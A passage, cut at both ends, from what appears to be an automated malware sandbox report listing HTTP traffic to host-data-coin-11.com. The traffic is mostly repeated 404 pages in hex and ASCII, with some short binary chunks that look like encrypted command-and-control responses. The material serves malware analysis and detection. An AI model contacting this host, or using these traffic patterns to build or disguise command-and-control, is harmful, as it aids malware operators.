68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 96 d3 08 55 3b 43 be f4 d4 fc fc 43 eb 1e d1 6d bc 19 74 b6 50 a1 b9 70 b8 7b 07 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OU;CCmtPp{P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 